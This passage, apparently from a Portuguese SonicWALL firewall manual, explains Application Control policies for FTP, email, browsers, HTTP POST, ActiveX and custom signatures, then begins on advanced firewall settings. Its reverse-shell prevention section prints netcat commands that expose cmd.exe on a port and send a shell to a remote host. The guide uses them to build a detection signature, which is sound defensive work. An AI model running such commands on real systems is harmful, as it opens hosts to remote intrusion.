especificar as zonas exatas entre as quais deve ser evitada a transferncia de arquivos. Por
exemplo, voc pode especificar LAN para WAN, LAN para DMZ ou qualquer outra zona que
voc definiu.
Proteo para servidores

Os servidores normalmente so acessados por vrios clientes no confiveis. Para melhor
proteo desses recursos valiosos, voc deve ter vrias linhas de defesa. Com Controle de
aplicativos no gateway, voc pode configurar polticas para proteger os seus servidores. Por
exemplo, voc pode criar uma poltica que bloqueia todos os comandos FTP put a fim de
impedir que algum grave um arquivo em um servidor (consulte Bloquear comandos FTP na
pgina 657). Embora o servidor possa estar configurado como somente leitura, isto adiciona
uma camada de segurana que controlada pelo administrador do firewall. O servidor
continuar protegido, mesmo se a sua configurao for alterada por um erro, um efeito
colateral de um patch ou por algum mal-intencionado. Com o Controle de aplicativos, voc
pode efetivamente controlar o carregamento de contedo para servidores usando HTTP,
SMTP, POP3 e FTP.
Um exemplo de polticas que afetam servidores poder ser um pequeno ISP fornecendo trs
nveis de servio aos seus clientes, cujos servidores se encontram em seu rack. No nvel de
ouro, um cliente pode hospedar um servidor Web, servidor de e-mail e servidor FTP. No nvel
de prata, um cliente pode hospedar apenas um servidor Web e um servidor de e-mail. No nvel
de bronze, o pacote que hospeda permite apenas um servidor Web. O ISP pode usar o
Controle de aplicativos para aplicar estas restries criando uma poltica para cada cliente.
Ambientes de e-mail hospedado

Um ambiente de e-mail hospedado um ambiente em que o e-mail est disponvel no provedor
de servios de Internet (ISP) de um usurio. Normalmente, o POP3 o protocolo usado para
transferncia de e-mail neste ambiente. Muitos proprietrios de pequenas empresas usam
este modelo e gostariam de controlar o contedo de e-mail e tambm os seus anexos. A
execuo do Controle de aplicativos no gateway oferece uma soluo para controlar e-mail
baseado em POP3 e SMTP.
O Controle de aplicativos tambm pode fazer a varredura de HTTP, o que til para e-mail
hospedado por sites como o Yahoo ou o Hotmail. Observe que quando um anexo bloqueado
ao usar HTTP, o Controle de aplicativos no fornece o nome do arquivo do arquivo bloqueado.
Voc tambm pode usar o Controle de aplicativos para controlar o FTP ao acessar os
servidores de banco de dados.
Se voc desejar uma soluo SMTP dedicada, possvel usar o SonicWALL Email Security.
O Email Security usado por vrias empresas de grandes dimenses para controlar e-mail
baseado em SMTP, mas ele no suporta POP3. Para controlar vrios protocolos de e-mail, o
Controle de aplicativos fornece uma excelente soluo.

Controle de e-mail
O Controle de aplicativos pode ser muito eficaz para determinados tipos de controle de e-mail,
especialmente quando desejada uma poltica geral. Por exemplo, voc pode evitar o envio
de anexos de um determinado tipo, como .exe, por usurio ou para um domnio inteiro. Como
a extenso do nome do arquivo est sendo correspondida nesse caso, a alterao da extenso
antes de enviar o anexo ir ignorar a filtragem. Observe que voc tambm pode impedir
anexos dessa forma em seu servidor de e-mail, se voc tiver um. Se no tiver, o Controle de
aplicativos fornece essa funcionalidade.
Voc pode criar um objeto de correspondncia que verifica o contedo do arquivo
correspondente a cadeias de caracteres como "confidenciais", "somente uso interno" e
"privado" para implementar controles bsicos na transferncia de dados confidenciais.
Voc tambm pode criar uma poltica que impede e-mails para ou de um domnio ou usurio
especfico. Voc pode usar o Controle de aplicativos para limitar o tamanho do arquivo de e-
mail, mas no para limitar o nmero de anexos. O Controle de aplicativos pode bloquear
arquivos com base no tipo MIME. Ele no consegue bloquear trfego SSL ou TLS criptografado
nem consegue bloquear "todos os arquivos criptografados". Para bloquear e-mails
criptografados de um site que est usando HTTPS, voc pode criar um objeto de
correspondncia personalizado que corresponda ao certificado enviado antes do incio da
sesso HTTPS. Isso faz parte da sesso SSL antes de ser criptografada. Em seguida, voc
pode criar uma poltica personalizada que bloqueia esse certificado.
O Controle de aplicativos pode verificar anexos de e-mail baseados em texto ou compactados
para um nvel, mas no criptografados. A tabela a seguir apresenta uma lista de formatos de
arquivo que o Controle de aplicativos pode verificar relativamente a palavras-chave. Outros
formatos devem ser testados antes de ser possvel us-los em uma poltica.
Tipo de arquivo Extenso comum

Cdigo fonte C c
Cdigo fonte C+ cpp
Valores separados por vrgula csv
Arquivos HQX hqx
HTML htm
Lotus 1-2-3 wks
Microsoft Access mdb
Microsoft Excel xls
Microsoft PowerPoint ppt
Microsoft Visio vsd
Microsoft Visual Basic vbp
Microsoft Word doc
Microsoft Works wps
Portable Document Format pdf
Rich Text Format rft
Arquivos SIT sit
Arquivos de texto txt
WordPerfect wpd

Tipo de arquivo Extenso comum
XML xml
Arquivos Tar ("tarballs") tar
Arquivos ZIP zip, gzip
Controle do navegador da Web

Voc tambm pode usar o Controle de aplicativos para proteger seus servidores da Web de
navegadores indesejveis. O Controle de aplicativos fornece tipos de objetos de
correspondncia para Netscape, MSIE, Firefox, Safari e Chrome. Voc pode definir um objeto
de correspondncia com um destes tipos e referenci-lo em uma poltica para bloquear esse
navegador.
Voc tambm pode acessar informaes sobre a verso do navegador usando um tipo de
objeto de correspondncia do agente do usurio HTTP. Por exemplo, verses mais antigas de
vrios navegadores podero ser suscetveis a problemas de segurana. Usando o Controle de
aplicativos, voc pode criar uma poltica que nega acesso por qualquer navegador
problemtico, como o Internet Explorer 5.0. Voc tambm pode usar a correspondncia
negativa para excluir todos os navegadores, exceto o(s) que voc desejar. Por exemplo, voc
poder desejar permitir apenas o Internet Explorer verso 6 devido a falhas na verso 5 e
porque voc ainda no testou a verso 7. Para fazer isso, voc deve usar um analisador de
protocolos de rede como o Wireshark para determinar o identificador do navegador da Web do
IEv6 que "MSIE 6.0". Em seguida, voc pode criar um objeto de correspondncia de tipo de
agente do usurio HTTP, com contedo "MSIE 6.0" e habilitar a correspondncia negativa.
Voc pode usar este objeto de correspondncia em uma poltica para bloquear navegadores
que no so MSIE 6.0. Para obter informaes sobre como usar o Wireshark para encontrar
um identificador de um navegador da Web, consulte Wireshark na pgina 634. Para obter
informaes sobre a correspondncia negativa, consulte Correspondncia negativa na
pgina 599.

Outro exemplo de um caso de uso para controlar o acesso de um navegador da Web um
pequeno site de comrcio eletrnico que est vendendo mercadorias que esto sendo
recuperadas de uma fonte exterior. Se um dos termos do contrato com o fornecedor for a
impossibilidade de vender a cidados da nao de origem, eles podem configurar o Controle
de aplicativos para bloquear o acesso s verses dos principais navegadores da Web do pas.
O Controle de aplicativos suporta uma seleo predefinida de navegadores conhecidos e voc
pode adicionar outros como objetos de correspondncia personalizados. O bloqueio do
navegador baseia-se no agente do usurio HTTP relatado pelo navegador. O objeto de
correspondncia personalizado deve incluir contedo suficientemente especfico para
identificar o navegador sem a criao de falsos positivos. Voc pode usar o Wireshark ou outro
analisador de protocolos de rede para obter uma assinatura exclusiva para o navegador
desejado.
Controle de HTTP Post

Voc pode melhorar a segurana de servidores HTTP pblicos de somente leitura no
permitindo o mtodo HTTP POST.
Primeiro, use o bloco de notas ou outro editor de texto para criar um novo documento
denominado Post.htm que contm o cdigo HTML abaixo. Salve o arquivo em sua rea de
trabalho ou em uma localizao conveniente.
<FORM action="http://www.yahoo.com/" method="post">
<p>Insira seu nome: <input type="Text" name="FullName"></p>
<input type="submit" value="Submit"> <INPUT type="reset">
Em seguida, abra o analisador de rede Wireshark e inicie uma captura. Para obter informaes
sobre como usar o Wireshark, consulte Wireshark na pgina 634. Em um navegador, abra o
formulrio Post.htm que acabou de criar e digite seu nome e, em seguida, clique em Enviar.
Pare a captura.
Usando a funo do Wireshark Editar > Localizar pacote, procure a cadeia de caracteres
"POST".
O Wireshark ir avanar para o primeiro quadro que contm os dados solicitados. Voc ver
algo como a tela mostrada abaixo. Isso indica que o mtodo HTTP POST imediatamente
transmitido aps as informaes de cabealho TCP e constitudo pelos primeiros quatro

bytes (504f5354) da carga do TCP (camada de aplicativos HTTP). Voc pode usar essas
informaes para criar um objeto de correspondncia personalizado que detecta o mtodo
HTTP POST.
Na interface de gerenciamento do SonicOS, navegue at Firewall > Objetos de

correspondncia e, em seguida, clique em Adicionar novo objeto de correspondncia. Crie
um objeto de correspondncia como aquele que mostrado abaixo. Observe que nesse objeto
de correspondncia especfico voc poder usar o recurso Habilitar configuraes para criar
um objeto que corresponda a uma determinada parte da carga. O campo Deslocamento
especifica qual o byte na carga para iniciar a correspondncia e ajuda a reduzir falsos
positivos, tornando a correspondncia mais especfica. O campo Profundidade especifica o
byte em que a correspondncia deve parar. Os campos Mn. e Mx. permitem que voc
especifique um tamanho de carga mnimo e mximo.

Em seguida, navegue at Firewall > Regras de aplicativos e clique em Adicionar nova
poltica. Crie uma poltica como aquela que mostrada abaixo.
Para testar, utilize um navegador para abrir o documento Post.htm que criou anteriormente.
Digite o seu nome e, em seguida, clique em Enviar. A conexo deve ser descartada neste
momento e voc dever ver um alerta no log semelhante ao que mostrado abaixo.
Controle de tipo de arquivo proibido

Voc pode usar o Controle de aplicativos para impedir que tipos de arquivos arriscados ou
proibidos (por exemplo, exe, vbs, scr, dll, avi, mov, etc.) sejam carregados ou baixados.

Navegue at Firewall > Objetos de correspondncia e clique em Adicionar novo objeto de
correspondncia. Crie um objeto como aquele que mostrado abaixo.
Em seguida, navegue at Firewall > Objetos de ao e clique em Adicionar novo objeto de

ao. Criar uma ao como aquela que mostrada abaixo.

Para criar uma poltica que usa este objeto e esta ao, navegue at Firewall > Regras de
aplicativos e clique em Adicionar nova poltica. Crie uma poltica como aquela que
mostrada abaixo.
Para testar esta poltica, voc poder abrir um navegador da Web e tentar fazer download de
todos os tipos de arquivos especificados no objeto de correspondncia (exe, vbs, scr). Abaixo
esto algumas URLs que voc pode experimentar:
http://download.skype.com/SkypeSetup.exe
http://us.dl1.yimg.com/download.yahoo.com/dl/msgr8/us/msgr8us.exe
http://g.msn.com/8reen_us/EN/INSTALL_MSN_MESSENGER_DL.EXE
Voc ver um alerta semelhante ao que mostrado abaixo.

Controle ActiveX
Um dos recursos mais teis do Controle de aplicativos a capacidade de distino entre tipos
diferentes de trfego de rede ActiveX ou Flash. Isso permite bloquear jogos ao permitir as
atualizaes do Windows. Antes do Controle de aplicativos, voc pode configurar o SonicOS
para bloquear o ActiveX com Servios de segurana > Filtro de contedo, mas isto bloqueia
todos os controles ActiveX, incluindo as atualizaes de software.
O Controle de aplicativos alcana esta distino atravs da verificao do valor de classID
na fonte HTML. Cada tipo de ActiveX tem a sua prpria ID de classe e a ID de classe poder
alterar nas diferentes verses do mesmo aplicativo.
Alguns tipos de ActiveX e as respectivas IDs de classe so mostrados na tabela a seguir.
Tipo ActiveX ID de classe

Apple Quicktime 02BF25D5-8C17-4B23-BC80-D3488ABDDC6B
Macromedia Flash v6, v7 D27CDB6E-AE6D-11cf-96B8-444553540000
Macromedia Shockwave D27CDB6E-AE6D-11cf-96B8-444553540000
Microsoft Windows Media Player v6.4 22d6f312-b0f6-11d0-94ab-0080c74c7e95
Microsoft Windows Media Player v7-10 6BF52A52-394A-11d3-B153-00C04F79FAA6
Real Networks Real Player CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA
Sun Java Web Start 5852F5ED-8BF4-11D4-A245-0080C6F74284
A captura de tela abaixo mostra um objeto de correspondncia de tipo ActiveX que est usando
a ID de classe Macromedia Shockwave. Voc pode criar uma poltica que usa este objeto de
correspondncia para bloquear jogos on-line ou outro contedo baseado em Shockwave.

Voc pode pesquisar a ID de classe desses controles ActiveX na Internet ou pode visualizar a
origem no seu navegador para encontr-la. Por exemplo, a captura de tela a seguir mostra um
arquivo de origem com a ID de classe de Macromedia Shockwave ou Flash.
Controle de FTP
O Controle de aplicativos fornece controle sobre o canal de controle de FTP e uploads e
downloads de FTP com o comando FTP e os tipos de objetos de correspondncia de contedo
de arquivos. Com eles, voc pode controlar o uso de FTP de forma muito eficiente. Os dois
casos de uso seguintes so descritos nesta seo:
Bloquear arquivos confidenciais de sada atravs de FTP na pgina 654
Bloquear arquivos codificados UTF-8/UTF-16 de sada na pgina 656
Bloquear comandos FTP na pgina 657
Bloquear arquivos confidenciais de sada atravs de FTP
Por exemplo, para bloquear transferncias de arquivos confidenciais de sada atravs de FTP,
voc pode criar uma poltica com base em palavras-chave ou padres dentro de arquivos.

Primeiro, voc precisa criar um objeto de correspondncia de tipo de contedo de arquivo que
corresponda a palavras-chave em arquivos.
Como alternativa, voc pode criar uma ao de notificao FTP personalizada que envia uma
mensagem para o cliente.
Em seguida, voc pode criar uma poltica que referencia este objeto de correspondncia e esta
ao. Se voc preferir simplesmente bloquear a transferncia de arquivos e redefinir a
conexo, voc pode selecionar a ao Redefinir/descartar ao criar a poltica.

Bloquear arquivos codificados UTF-8/UTF-16 de sada
O suporte de unicode nativo UTF-8 e UTF-16 atravs do Controle de aplicativos permite que
caracteres multibyte codificados, como caracteres chineses ou japoneses, sejam inseridos
como palavras-chave de contedo de objeto de correspondncia usando o tipo de entrada
alfanumrica. O Controle de aplicativos suporta correspondncia de palavras-chave de
contedo codificado UTF-8 tipicamente encontrado em pginas da Web e aplicativos de e-mail
e contedo codificado UTF-16 normalmente encontrado em documentos baseados no sistema
operacional Windows/Microsoft Office.
O bloqueio de transferncias de arquivos de sada de arquivos confidenciais Unicode por FTP
tratado da mesma forma que o bloqueio de outras transferncias de arquivos confidenciais.
Primeiro, crie um objeto de correspondncia que corresponda em palavras-chave codificadas
UTF-8 ou UTF-16 em arquivos. Em seguida, crie uma poltica que referencia o objeto de
correspondncia e bloqueia a transferncia de arquivos correspondentes.
O exemplo mostrado abaixo usa um tipo de objeto de correspondncia de contedo de arquivo
com uma palavra-chave chinesa codificada UTF-16 que convertida para "documento
confidencial".

Em seguida, crie uma poltica que referencia o objeto de correspondncia, como mostrado
abaixo. Essa poltica bloqueia a transferncia de arquivos e reinicia a conexo. A opo
Habilitar registro em log est selecionada para que no seja registrada nenhuma tentativa de
transferncia de um arquivo contendo a palavra-chave codificada UTF-16.
gerada uma entrada de log depois da redefinio/descarte de uma conexo. Um exemplo de

uma entrada de log mostrado abaixo, incluindo a mensagem informando que um alerta de
Controle de aplicativos, exibindo o nome da poltica e o tipo de ao de redefinio/descarte.
Bloquear comandos FTP
Voc pode usar o Controle de aplicativos para garantir que seu servidor FTP de somente
leitura, bloqueando comandos como put, mput, rename_to, rename_from, rmdir e mkdir.
Este caso de uso mostra um objeto de correspondncia que contm somente o comando put,
mas voc pode incluir todos estes comandos no mesmo objeto de correspondncia.

A primeira etapa criar um objeto de correspondncia que corresponda no comando put. Uma
vez que o comando mput uma variao do comando put, um objeto de correspondncia que
corresponda no comando put corresponder tambm no comando mput.
Como alternativa, voc pode criar uma ao de notificao FTP personalizada que envia uma
mensagem para o cliente. mostrada uma ao personalizada na captura de tela abaixo.
Em seguida, voc pode criar uma poltica que referencia este objeto de correspondncia e esta
ao. Se voc preferir simplesmente bloquear o comando put e redefinir a conexo, voc pode
selecionar a ao Redefinir/descartar ao criar a poltica.

Voc pode usar o gerenciamento de largura de banda de camada de aplicativo para controlar
a quantidade de largura de banda de rede que pode ser usada para transferir determinados
tipos de arquivos. Isso permite que voc desencoraje trfego no produtivo e encoraje trfego
produtivo em sua rede.
Por exemplo, voc pode limitar a largura de banda utilizada para fazer download de arquivos
MP3 atravs de FTP para no mais de 400 quilobits por segundo (kbps). Se um usurio ou 100
usurios esto fazendo o download de arquivos MP3, esta poltica limitar a largura de banda
agregada para 400 kbps.
Ignorar DPI
Voc pode usar a ao Ignorar DPI para aumentar o desempenho atravs da rede se voc
souber que o contedo que est sendo acessado seguro. Por exemplo, este poder ser o
caso se sua empresa tiver um vdeo corporativo que voc deseja transmitir para os
funcionrios da empresa atravs de HTTP, concedendo-lhes acesso a uma URL em um
servidor Web. Uma vez que voc sabe que o contedo seguro, possvel criar uma poltica
de Controle de aplicativos que se aplica ao Ignorar DPI em cada acesso a este vdeo. Isto
garantir velocidades de fluxo mais rpidas e a melhor qualidade de visualizao para os
funcionrios acessando o vdeo.
Apenas duas etapas so necessrias para a criao da poltica. Primeiro, voc pode definir um
objeto de correspondncia para o vdeo corporativo usando um tipo de objeto de
correspondncia de Contedo de URI de HTTP:
Lembre-se de que a barra principal (/) da URL deve sempre ser includa para tipos de
Correspondncia exata e Correspondncia de prefixo de objetos de correspondncia de
contedo de URI. No necessrio incluir o cabealho de host, como "www.company.com", no
campo Contedo.

Em seguida, crie uma poltica que use o objeto de correspondncia Vdeo corporativo e a ao
Ignorar DPI:
Assinatura personalizada
Voc pode criar um objeto de correspondncia personalizado que corresponda a qualquer
parte de um pacote se desejar controlar o trfego que no tem um tipo de objeto predefinido
no Controle de aplicativos. Isso permite que voc crie uma assinatura personalizada para
qualquer protocolo de rede.
Por exemplo, voc pode criar uma assinatura personalizada para corresponder aos pacotes de
solicitao HTTP GET. Voc pode usar esta opo se desejar evitar a navegao na Web a
partir da rede local.
Para determinar um identificador exclusivo para um pacote HTTP GET, voc pode usar o
analisador de protocolos de rede Wireshark para visualizar o cabealho do pacote. Para obter
mais informaes sobre o uso do Wireshark, consulte Wireshark na pgina 634. No Wireshark,
capture alguns pacotes que incluem o trfego no qual voc est interessado. Nesse caso, voc

poder desejar capturar um pacote de solicitao HTTP GET . Voc pode usar qualquer
navegador da Web para gerar a solicitao HTTP GET. A imagem a seguir mostra um pacote
de solicitao HTTP GET exibido pelo Wireshark.
No painel superior do Wireshark, role para baixo at localizar o pacote HTTP GET e, em
seguida, clique nessa linha. O pacote exibido nos dois painis inferiores. Para um pacote
SYN, o painel central fornece uma interpretao legvel do cabealho do pacote e os bytes do
cabealho atual so mostrados em hexadecimal no painel inferior.
No painel central, expanda a seo Protocolo de transferncia de hipertexto para ver a carga
do pacote e clique no identificador desejado para referenciar no Controle de aplicativos. Nesse
caso, o identificador o comando GET nos primeiros trs bytes. Clique nele para realar os
bytes correspondentes no painel inferior.
Voc pode determinar o deslocamento e a profundidade dos bytes realados no painel inferior.
O deslocamento e a profundidade so termos usados pelo Controle de aplicativos. O
deslocamento indica qual o byte no pacote para iniciar a correspondncia e a profundidade
indica o ltimo byte de correspondncia. O uso de um deslocamento permite uma
correspondncia muito especfica e reduz os falsos positivos. Quando voc calcular o
deslocamento e a profundidade, observe que o primeiro byte no pacote contabilizado como
o nmero um (no zero). Os nmeros decimais so usados em vez de hexadecimais para
calcular o deslocamento e a profundidade. O deslocamento e a profundidade associados a um
objeto de correspondncia personalizado so calculados com incio na carga do pacote (o
incio da carga TCP ou UDP). Nesse caso, o deslocamento 1 e a profundidade 3.

Agora voc pode criar um objeto de correspondncia personalizado que usa esta informao.
Na janela Configuraes do objeto de correspondncia, digite um nome descritivo para o

objeto e, em seguida, selecione Objeto personalizado na lista suspensa Tipo de objeto de
correspondncia. Marque a caixa de seleo Habilitar configuraes. Na caixa de texto
Deslocamento, digite 1 (o byte inicial do identificador). Na caixa de texto Profundidade, digite
3 (o ltimo byte do identificador). Voc pode deixar o Tamanho da carga definido para o
padro. O tamanho da carga usado para indicar a quantidade de dados no pacote, mas,
nesse caso, estamos apenas preocupados com o cabealho do pacote.
Para representao de entrada, clique em Hexadecimal. Na caixa de texto Contedo, digite
os bytes como mostrado pelo Wireshark: 474554. No inclua espaos no contedo
hexadecimal.
A prxima etapa usar este objeto de correspondncia em uma poltica de regras de
aplicativo. Na janela Configuraes da poltica de controle de aplicativos, digite um nome de
poltica descritivo e selecione Cliente HTTP para o tipo de poltica. Na lista suspensa Objeto
de correspondncia, selecione o objeto de correspondncia que voc acabou de definir.
Selecione uma ao personalizada ou uma ao padro, como Redefinir/descartar. Para o
Lado da conexo, selecione Do lado do cliente. Voc pode tambm modificar outras
configuraes. Para obter mais informaes sobre a criao de uma poltica, consulte

Configurar uma poltica de regras de aplicativos na pgina 620.
Preveno de explorao de shell inverso

A explorao de shell inverso um ataque que voc pode impedir usando o recurso de
assinatura personalizada do Controle de aplicativos (consulte Assinatura personalizada na
pgina 660). Uma explorao de shell inverso pode ser usada por um invasor se ele for bem-
sucedido na obteno de acesso ao seu sistema por meio de uma explorao de dia zero. Uma
explorao de dia zero se refere a um ataque cuja assinatura ainda no foi reconhecida pelo
software de segurana.
Em uma fase inicial, enquanto ainda desconhecidas, as cargas maliciosas podem passar pela
primeira linha de defesa que o IPS e o Antivrus do gateway (GAV) em execuo no gateway
da Internet e at mesmo a segunda linha de defesa representada pelo software antivrus
baseado em host, permitindo a execuo de cdigo arbitrrio no sistema de destino.
Em muitos casos, o cdigo executado contm a quantidade mnima de instrues necessrias
para o invasor para chegar remotamente a uma janela de prompt de comando (com os
privilgios do servio explorado ou do usurio conectado) e continuar com a penetrao a
partir desse local.
Como um meio comum para desviar problemas de NAT/firewall que possam impedir a
capacidade de conexo ativa a um sistema explorado, os invasores faro com que o sistema
vulnervel execute um shell inverso. Em um shell inverso, a conexo ao endereo do invasor
iniciada pelo host de destino usando portas TCP/UDP bem conhecidas para melhor evitar
polticas de sada rgidas.

Este caso de uso aplicvel a ambientes de hospedagem de sistemas Windows e
interceptaro conexes no criptografadas em todas as portas TCP/UDP.
Nota As redes que usam servio Telnet no criptografado devem configurar polticas que
excluam os endereos IP desses servidores.
Embora esse caso de uso se refira ao caso especfico de cargas de shell inverso (conexes
de sada), mais seguro configurar a poltica para que esta seja eficiente tambm para
conexes de entrada. Isso protege contra um caso em que a carga executada gera um shell
de escuta no host vulnervel e o invasor se conecta a esse servio atravs de firewalls mal
configurados.
A configurao atual requer o seguinte:
Gerar a atividade de rede atual para que seja identificada, usando a ferramenta netcat
Capturar a atividade e exportar a carga para um arquivo de texto, usando a ferramenta
Wireshark
Criar um objeto de correspondncia com uma cadeia de caracteres razoavelmente
especfica e exclusiva o suficiente para evitar falsos positivos
Definir uma poltica com a ao a ser executada quando uma carga que contm o objeto
analisada (o padro Redefinir/descartar usado aqui)
Gerar a atividade de rede
A ferramenta netcat oferece, entre outros recursos, a capacidade de vincular a sada de um

programa a uma conexo de sada ou de escuta. Os exemplos de uso a seguir mostram como
configurar um "daemon de prompt de comando" de escuta ou como efetuar a conexo a um
ponto terminal remoto e fornecer um prompt de comando interativo:
nc l p 23 e cmd.exe
Estar disponvel um prompt do Windows para os hosts que se conectam porta 23 (a
opo -l significa modo de escuta, em oposio a padro, implcito, modo de conexo).
nc e cmd.exe 44.44.44.44 23
Estar disponvel um prompt do Windows para o host 44.44.44.44 se o host 44.44.44.44
estiver escutando na porta 23 usando o comando netcat:
nc -l -p 23
Capturar e exportar a carga para um arquivo de texto usando o Wireshark
Para capturar os dados, inicie o Wireshark e clique em Capturar > Interfaces para abrir um
dilogo de captura. Inicie uma captura na interface com o trfego netcat. Assim que a captura
for iniciada, execute o comando netcat e, em seguida, pare a captura.

A imagem a seguir mostra o fluxo de dados atravs da rede durante uma conexo desse tipo
(Vista Enterprise, junho de 2007):
Os dados hexadecimais podem ser exportados para um arquivo de texto para desativar o
cabealho de pacote, partes e espaos desnecessrios ou variveis. As partes relevantes aqui
so "Microsoft... reservado". Voc pode usar o recurso de exportao de carga hexadecimal
do Wireshark para tal. Para obter informaes sobre o Wireshark, consulte Wireshark na
pgina 634.
Criar um objeto de correspondncia
Os seguintes caracteres hexadecimais so inseridos como o contedo do objeto de

correspondncia representando o banner do prompt do comando Vista:
4D6963726F736F66742057696E646F7773205B56657273696F6E20362E302E363030305D0
D0A436F70797269676874202863292032303036204D6963726F73667420436F72706F7261
74696F6E2E
Note que a exportao da identificao e a definio do objeto de correspondncia no
precisam realmente usar a notao hexadecimal aqui (a assinatura atual texto ASCII neste
caso). O hexadecimal s necessrio para assinaturas de binrio.
So obtidas entradas semelhantes da mesma forma a partir de hosts do Windows 2000 e
Windows XP e usadas para criar outros objetos de correspondncia, resultando em trs
objetos de correspondncia mostrados abaixo:
Outros exemplos para o Windows Server 2003 ou qualquer outra verso do Windows podem
ser facilmente obtidos usando o mtodo descrito.
Os administradores de Linux/Unix precisaro personalizar a varivel de ambiente padro para
tirar proveito dessa defesa baseada em assinatura, uma vez que o prompt padro no
geralmente suficientemente especfico ou exclusivo para ser usado como descrito acima.

Definir a poltica
Depois de criar os objetos de correspondncia, voc pode definir uma poltica que os usa. A
imagem abaixo mostra as outras configuraes de poltica. Este exemplo, tal como mostrado,
especfico de shells invertidos nas configuraes Nome da poltica e Direo. Conforme
mencionado, tambm poder ser personalizado para um escopo maior, alterando a
configurao Direo para Ambos e atribuindo um nome mais genrico.
Uma entrada de log com uma categoria de acesso rede gerada depois de uma conexo de
Redefinir/descartar. A captura de tela abaixo mostra a entrada de log, incluindo a mensagem
informando que um alerta de Controle de aplicativos e exibindo o nome da poltica:
Tal como a experincia sugere, medidas de segurana apropriadas incluem vrias camadas
de inteligncia e nenhuma abordagem pode ser considerada uma defesa definitiva contra
cdigo hostil.

Glossrio
Camada de aplicativo: O stimo nvel do modelo OSI de 7 camadas; exemplos de
protocolos de camada de aplicativo so AIM, DNS, FTP, HTTP, IMAP, MSN Messenger,
POP3, SMTP, SNMP, TELNET e Yahoo Messenger
Gerenciamento da largura de banda: O processo de medio e controle de trfego em um
link de rede para evitar o congestionamento da rede e o fraco desempenho desta
Cliente: Normalmente, o cliente (em uma arquitetura de cliente-servidor) um aplicativo que
executado em um computador pessoal ou estao de trabalho e que depende de um servidor
para executar algumas operaes
Gerenciamento de direitos digitais: Tecnologia usada por editores ou detentores de
direitos autorais para controlar o acesso a e o uso de dados digitais
FTP: Protocolo de transferncia de arquivos, um protocolo para trocar arquivos atravs da
Internet
Gateway: Um computador que serve como um ponto de entrada para uma rede; funciona
frequentemente como um firewall ou um servidor de proxy
Controle granular: A capacidade de controlar componentes separados de um sistema
Hexadecimal: Refere-se ao sistema de 16 nmeros base
HTTP: Hyper Text Transfer Protocol, o protocolo subjacente usado pela World Wide Web
Redirecionamento HTTP: Tambm conhecido como redirecionamento URL, uma tcnica na
Web para disponibilizar uma pgina da Web em muitas URLs
IPS: Servio de preveno contra intruses
MIME: Extenses Multifuno para Mensagens de Internet, uma especificao para formatar
mensagens que no sejam ASCII, como grficos, udio ou vdeo, para que elas possam ser
enviadas pela Internet
POP3: Post Office Protocol, um protocolo usado para recuperar e-mail de um servidor de e-
mail; pode ser usado com ou sem SMTP
Proxy: Um computador que opera um servio de rede que permite que os clientes realizem
conexes de rede indiretas a outros servios de rede
SMTP: Simple Mail Transfer Protocol, um protocolo usado para enviar mensagens de e-mail
entre servidores
UDP: Protocolo de Datagrama de Usurio, um protocolo sem conexo que executado no topo
de redes IP

Parte 9
Configuraes de firewall
| 669
Captulo 43
Definir configuraes avanadas de
firewall
Configuraes de firewall > Avanado

Esta seo fornece aos administradores de rede as configuraes avanadas de firewall para
configurar preveno de deteco, portas dinmicas, pacotes roteados de origem, seleo de
conexo e opes de regras de acesso. Para configurar as opes avanadas de regras de
acesso, selecione Configuraes de firewall > Avanado em Firewall.
Definir configuraes avanadas de firewall | 671

A pgina Configuraes de firewall > Avanado contm os seguintes grupos de opes de
configurao do firewall:
Preveno de deteco na pgina 672
Portas dinmicas na pgina 672
Pacotes roteados de origem na pgina 673
Conexes na pgina 673
Imposio de soma de verificao de IP e UDP na pgina 674
Quadro Jumbo na pgina 674
Configuraes avanadas de IPv6 na pgina 675
Preveno de deteco
Habilitar modo furtivo por padro, o dispositivo de segurana responde a solicitaes
de conexes de entrada como "bloqueadas" ou "abertas". Se voc habilitar o modo furtivo,
o dispositivo de segurana no responde a solicitaes de conexes de entrada
bloqueadas. O modo furtivo torna seu dispositivo de segurana essencialmente invisvel
para hackers.
Tornar ID de IP aleatrio selecione Tornar ID de IP aleatrio para impedir que os
hackers usem vrias ferramentas de deteco para detectar a presena de um dispositivo
de segurana. Os pacotes de IP recebem IDs de IP aleatrios, dificultando aos hackers a
identificao do dispositivo de segurana.
Reduzir TTL de IP para trfego encaminhado TTL (Time-to-live Vida til) um valor
em um pacote de IP que informa um roteador de rede se o pacote esteve ou no
demasiado tempo na rede e se deve ou no ser descartado. Selecione esta opo para
reduzir o valor de TTL para pacotes que foram encaminhados e que, por conseguinte, j
estiveram na rede durante algum tempo.
Nunca gerar pacotes ICMP de tempo excedido o firewall gera pacotes de tempo
excedido para reportar quando ele tiver descartado um pacote, pois o respectivo valor
de TTL diminuiu para zero. Selecione esta opo se voc no desejar que o firewall
gere os pacotes de relatrios.
Portas dinmicas
Habilitar transformaes FTP para porta(s) TCP no objeto de servio selecione o menu
suspenso grupo de servios para habilitar transformaes FTP para um determinado
objeto de servio. Por padro, o grupo de servio FTP (Tudo) est selecionado. Para obter
mais informaes sobre como configurar grupos de servio e objetos de servio, consulte
Rede > Servios na pgina 293.
Habilitar suporte para Oracle (SQLNet) - selecione essa opo se voc tiver Oracle9i ou
aplicativos anteriores em sua rede. Para aplicativos Oracle10g ou posteriores,
recomendamos que essa opo no seja selecionada.
Para aplicativos Oracle9i e anteriores, a porta do canal de dados diferente da porta
de conexo de controle. Quando essa opo est habilitada, uma conexo de controle
SQLNet verificada em busca de um canal de dados sendo negociado. Quando uma
negociao encontrada, uma entrada de conexo para o canal de dados criada
dinamicamente, com NAT aplicado, se necessrio. No SonicOS, o SQLNet e o canal
de dados so associados um ao outro e tratados como uma sesso.
Para aplicativos Oracle10g e posteriores, as duas portas so as mesmas, sendo assim
a porta do canal de dados no precisa ser rastreada separadamente; dessa forma, a
opo no precisa estar habilitada.

Habilitar transformaes RTSP selecione esta opo para suportar o fornecimento sob
demanda de dados em tempo real, como udio e vdeo. O RTSP (protocolo de fluxo em
tempo real) um protocolo ao nvel de aplicativos que controla o fornecimento de dados
com propriedades em tempo real.
Pacotes roteados de origem

Descartar pacotes IP roteados de origem (Habilitado por padro.) Desmarque essa
caixa de seleo se voc estiver testando o trfego entre dois hosts especficos e estiver
usando roteamento de origem.
Roteamento de origem IP uma opo padro em IP que permite ao remetente de um
pacote especificar alguns ou todos os roteadores que devem ser usados para levar o
pacote ao seu destino.
Essa opo de IP normalmente tem o uso bloqueado, pois pode ser usada por uma escuta
para receber pacotes inserindo uma opo de enviar os pacotes de A para B pelo roteador
